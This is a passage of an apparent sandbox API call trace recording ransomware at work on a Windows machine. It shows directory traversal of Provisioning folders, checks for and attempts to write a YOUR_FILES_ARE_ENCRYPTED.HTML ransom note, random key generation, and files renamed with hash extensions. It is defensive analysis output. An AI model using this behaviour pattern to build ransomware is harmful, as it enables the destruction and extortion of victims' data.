dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.109] GetProcessHeap () returned 0x600000 [0110.109] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.109] GetProcessHeap () returned 0x600000 [0110.109] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.110] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee62d6b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaee62d6b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee7f72a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.110] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee62d6b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaee62d6b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaee7f72a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.110] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.111] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.111] GetProcessHeap () returned 0x600000 [0110.111] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.111] GetProcessHeap () returned 0x600000 [0110.111] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.111] GetProcessHeap () returned 0x600000 [0110.112] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.112] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaeea7b4e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeea7b4e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{c5dc3753-b6c8-4057-b396-bf13d769311c}", cAlternateFileName="{C5DC3~1")) returned 1 [0110.112] StrStrIW (lpFirst="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.112] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}") returned 84 [0110.112] GetProcessHeap () returned 0x600000 [0110.112] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.114] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}" [0110.114] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*" [0110.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaeea7b4e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeecc58a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.114] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaeea7b4e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeecc58a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.114] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebc2ab1, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xebc2ab1, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xaeeab63c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x666, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.1A2FFEF383CF6C4FA82BE7FF8229EB81281CADD0E9878668836F8842302F470F", cAlternateFileName="CUSTOM~1.1A2")) returned 1 [0110.114] StrStrIW (lpFirst="customizations.xml.1A2FFEF383CF6C4FA82BE7FF8229EB81281CADD0E9878668836F8842302F470F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.114] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml.1A2FFEF383CF6C4FA82BE7FF8229EB81281CADD0E9878668836F8842302F470F") returned 168 [0110.114] PathFindExtensionW (pszPath="customizations.xml.1A2FFEF383CF6C4FA82BE7FF8229EB81281CADD0E9878668836F8842302F470F") returned=".1A2FFEF383CF6C4FA82BE7FF8229EB81281CADD0E9878668836F8842302F470F" [0110.114] lstrlenW (lpString=".1A2FFEF383CF6C4FA82BE7FF8229EB81281CADD0E9878668836F8842302F470F") returned 65 [0110.114] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb9c845, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb9c845, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb9c845, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.114] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.114] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml") returned 104 [0110.114] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.114] lstrlenW (lpString=".xml") returned 4 [0110.114] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.114] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.115] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.115] CloseHandle (hObject=0x30c) returned 1 [0110.115] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.115] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.115] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov") returned 89 [0110.115] GetProcessHeap () returned 0x600000 [0110.115] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.116] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov" [0110.116] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*" [0110.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaeec513b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0110.117] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaeec513b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.117] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.117] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.117] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime") returned 97 [0110.117] GetProcessHeap () returned 0x600000 [0110.117] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.118] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime" [0110.118] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*" [0110.118] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaeebb40b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f431c, dwReserved1=0x6f4268, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.118] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaeebb40b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f431c, dwReserved1=0x6f4268, cFileName="..", cAlternateFileName="")) returned 1 [0110.118] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb50367, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb50367, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb765cf, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x2a5, dwReserved0=0x6f431c, dwReserved1=0x6f4268, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.118] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.118] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.118] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.118] lstrlenW (lpString=".provxml") returned 8 [0110.118] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.118] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeebb40b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeebb40b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeebef1f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f431c, dwReserved1=0x6f4268, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.118] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeebb40b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeebb40b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeebef1f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f431c, dwReserved1=0x6f4268, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.119] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.119] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.119] GetProcessHeap () returned 0x600000 [0110.119] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.119] GetProcessHeap () returned 0x600000 [0110.119] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.119] GetProcessHeap () returned 0x600000 [0110.119] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.120] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb9c845, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb9c845, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb9c845, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0110.120] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.121] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml") returned 101 [0110.121] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.121] lstrlenW (lpString=".xml") returned 4 [0110.121] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0110.121] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.121] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=434) returned 1 [0110.121] CloseHandle (hObject=0x32c) returned 1 [0110.121] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeec513b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeec513b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeec8a9d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.121] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeec513b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeec513b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeec8a9d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.121] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0110.122] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.122] GetProcessHeap () returned 0x600000 [0110.122] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.136] GetProcessHeap () returned 0x600000 [0110.136] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.136] GetProcessHeap () returned 0x600000 [0110.136] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.137] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeecc58a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeecc58a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeecffeb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.137] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeecc58a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeecc58a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeecffeb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.137] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.138] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.138] GetProcessHeap () returned 0x600000 [0110.138] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.138] GetProcessHeap () returned 0x600000 [0110.138] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.138] GetProcessHeap () returned 0x600000 [0110.138] HeapFree (in: hHeap=0x600000, dwFlags=0x0, 